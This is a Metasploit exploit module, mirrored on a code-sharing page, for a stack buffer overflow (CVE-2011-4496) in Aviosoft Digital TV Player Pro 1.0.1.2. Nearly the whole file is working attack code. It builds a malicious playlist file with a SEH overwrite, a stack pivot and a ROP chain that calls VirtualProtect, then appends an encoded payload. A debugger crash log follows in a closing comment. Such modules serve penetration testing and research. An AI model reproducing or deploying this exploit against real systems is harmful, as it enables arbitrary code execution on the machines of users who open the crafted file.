Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
23593 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",

16
        'Description' => %q{

17
          This module exploits a vulnerability found in Aviosoft Digital TV Player

18
          Pro version 1.x.  An overflow occurs when the process copies the content of a

19
          playlist file on to the stack, which may result arbitrary code execution under

20
          the context of the user.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [

24
          'modpr0be', # Initial discovery, poc

25
          'sinn3r', # Metasploit

26
        ],

27
        'References' => [

28
          ['CVE', '2011-4496'],

29
          ['OSVDB', '77043'],

30
          ['EDB', '18096'],

31
        ],

32
        'Payload' => {

33
          'BadChars' => "\x00\x0a\x1a",

34
          'StackAdjustment' => -3500,

35
        },

36
        'DefaultOptions' => {

37
          'EXITFUNC' => "seh",

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          [

42
            'Aviosoft DTV Player 1.0.1.2',

43
            {

44
              'Ret' => 0x6130534a, # Stack pivot (ADD ESP,800; RET)

45
              'Offset' => 612, # Offset to SEH

46
              'Max' => 5000 # Max buffer size

47
            }

48
          ],

49
        ],

50
        'Privileged' => false,

51
        'DisclosureDate' => '2011-11-09',

52
        'DefaultTarget' => 0,

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60


61
    register_options(

62
      [

63
        OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf'])

64
      ]

65
    )

66
  end

67


68
  def junk(n = 1)

69
    return [rand_text_alpha(4).unpack("L")[0]] * n

70
  end

71


72
  def nops(rop = false, n = 1)

73
    return rop ? [0x61326003] * n : [0x90909090] * n

74
  end

75


76
  def exploit

77
    rop = [

78
      nops(true, 10),  # ROP NOP

79
      0x6405347a,      # POP EDX # RETN (MediaPlayerCtrl.dll)

80
      0x10011108,      # ptr to &VirtualProtect

81
      0x64010503,      # PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll)

82
      junk,

83
      0x6160949f,      # MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll)

84
      junk(3),

85
      0x61604218,      # PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll)

86
      junk(3),

87
      0x6403d1a6,      # POP EBP # RETN (MediaPlayerCtrl.dll)

88
      junk(3),

89
      0x60333560,      # & push esp #  ret 0c (Configuration.dll)

90
      0x61323EA8,      # POP EAX # RETN (DTVDeviceManager.dll)

91
      0xA13977DF,      # 0x00000343-> ebx

92
      0x640203fc,      # ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)

93
      0x6163d37b,      # PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll)

94
      0x61626807,      # XOR EAX,EAX # RETN (EPG.dll)

95
      0x640203fc,      # ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)

96
      0x6405347a,      # POP EDX # RETN (MediaPlayerCtrl.dll)

97
      0xA13974DC,      # 0x00000040-> edx

98
      0x613107fb,      # ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll)

99
      0x60326803,      # POP ECX # RETN (Configuration.dll)

100
      0x60350340,      # &Writable location

101
      0x61329e07,      # POP EDI # RETN (DTVDeviceManager.dll)

102
      nops(true),      # ROP NOP

103
      0x60340178,      # POP EAX # RETN

104
      nops,            # Regular NOPs

105
      0x60322e02       # PUSH # RETN

106
    ].flatten.pack("V*")

107


108
    buf = ''

109
    buf << rand_text_alpha(target['Offset'] - buf.length)

110
    buf << [target.ret].pack('V*')

111
    buf << rand_text_alpha(136)

112
    buf << rop

113
    buf << make_nops(32)

114
    buf << payload.encoded

115
    buf << rand_text_alpha(target['Max'] - buf.length)

116


117
    file_create(buf)

118
  end

119
end

120


121
=begin

122
eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000

123
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0         nv up ei pl nz na pe nc

124
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

125
MediaPlayerCtrl!DllCreateObject+0x220:

126
6400f6f0 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

127
0:000> !exchain

128
0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll

129
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll -

130
DTVDeviceManager+534a (6130534a)

131
Invalid exception stack at 41414141

132
0:000> !address edi

133
    00130000 : 00130000 - 00003000

134
                    Type     00040000 MEM_MAPPED

135
                    Protect  00000002 PAGE_READONLY

136
                    State    00001000 MEM_COMMIT

137
                    Usage    RegionUsageIsVAD

138
0:000> !address esi

139
    047a0000 : 047a0000 - 0000b000

140
                    Type     00020000 MEM_PRIVATE

141
                    Protect  00000004 PAGE_READWRITE

142
                    State    00001000 MEM_COMMIT

143
                    Usage    RegionUsageHeap

144
                    Handle   013c0000

145
=end

146


147